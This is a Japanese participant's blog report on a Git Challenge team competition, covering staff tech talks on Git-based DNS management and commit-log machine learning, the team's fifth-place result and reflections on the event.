ドメイン管理をする際に, 手動でやろうとするとミスが出たり, ログが残らなかったりします。 そこで, Gitでドメイン管理をすることでこれらの問題を解決しようという試みだそうです。 技術仕様としては, DNSであるAWSのRoute53にDrone CIを噛ませ, GitHubでドメイン管理するというものでした。
私は自分用のドメインを持っていないので欲しいなと思うなどしました。*4
チュートリアル
問題に関する情報は非公開とのことなので割愛します。
昼食
チキンカレーをいただきました。昼食はチームDeltaの方々とスタッフのお2方とご一緒しました。
競技本番&解説
問題に関する情報は非公開とのことなので割愛します。
結果は, 17スターで同率5位でした。
問題とは関係ないのですが, 解説前に乾杯をしました。スタッフさん含めほとんどの方がアルコールを摂取していたので, 自由だなという印象を受けました。
スタッフによる技術解説 part2
コミットログで機械学習
Git本体のGitリポジトリに溜まっている約55000件のコミットログを使って, コミットメッセージから特徴を抽出して変更対象の機能を予測しよう と考えたそうです。
pygit2で集めたデータをよしなにPandasに投げて分析を行い, 結果として正解しているケースが現れたそうです。しかし, 精度で見ると0.26...と低い値であり, 偶然の産物とも考えられる結果になったそうです。
結果に対する考察として, コミットメッセージとして署名を含んでし待ったことが精度が下がってしまった原因ではないかと考えたそうです。また, 今回はコミットメッセージに含まれるタグを教師データとして用いていましたが, 変更されたファイル名を教師データとして用いても良いのではないかという話もしていました。
懇談会
軽食と共に他の参加者やスタッフの方々とお話をする時間でした。
そのはずでしたが, 最後の問題を通しておきたかったので解説を改めて拝聴してACしました。
その後は, ほとんどの時間をスタッフの方々との話に費やしていた気がします。話していた内容としては, 私事のプロジェクトや実際の業務, それに自作キーボードの話などでした。
詳しい話を書くと更に長くなりそうなのでやめておきます。
感想
競技に関して
2人で1組なので, もし自分が解けなくとも相方が解ける問題があったり, またその逆もあったりしました。そのため, 私はチーム内でしっかりとコミュニケーションを取ることが重要だと感じました。
幸いにして, 私の相方は気さくな方だったので, 問題が解けた時にお互いで進捗を確かめあったり褒めあったりしていました。結果的に優勝は逃したものの, よく健闘していた方だと思いますし, 良い意味でチーム戦をできていたと考えています。
また, 競技で優勝した方によると, 普段からGitのリポジトリを破壊して修復することが多いのでその経験が大いに役立ったとのことでした。やはり経験が重要なのかなとも思いました。
懇談会に関して
以前参加したBSC*5では他の参加者との話で時間を使ってしまったため, 今回はスタッフの方々とお話しようと決めていました。その結果, 私が個人的に進めているプロジェクトに関する技術的な話や, mixiさんの業務に関する話など多くの話をすることができました。
結果的に, 以前のBSCと比べて, 交流関係の拡大が乏しかったものの多くの情報量を得ることができたChallengeとなりました。
展望
おそらく, 今回のGit Challengeほど多く$ git *というコマンドを叩いたのは初めてでした。更に, 普段のGit使用で見ることのなかったコマンドやフォルダ構成などについて知ることができました。これは素晴らしい知見であり, 今後は積極的にGitリポジトリを壊して$ git fsckを叩いていく人生を送っていきたいと思います。*6
スタッフの皆さんへ
Git Challengeというイベントを開催していただき, 本当にありがとうございました! イベント中になんどもリセットをお願いしたり, 遅くまでお話していただいたりと色々とご迷惑をおかけしましたが, 全てしっかりと対応していただき本当に感謝しています。
ありがとうございました!お疲れ様でした!
おわりに
毎回言っている気がしますが, こういったイベントはやはり良いです。 私が趣味で競技プログラミングやCTFをやっているというのもあるかもしれませんが, 問題を解決することで他人と競えるイベントというのは本当に楽しかったです。
また, BSC, Git Challengeに参加してきたので, 残りのTDDC*7にも参加してみたいと考えています。そのために, 更に研鑽を積んで積極的に新しいことに挑戦していく姿勢を保ち続けていこうと考えています。
以上がGit Challengeの参加記となります。 Gitの使い方について深く知れるだけでなく, スタッフや他の参加者と話して知識を広げるチャンスなので, ぜひ次回のGit Challengeに参加してみてはいかがでしょうか?
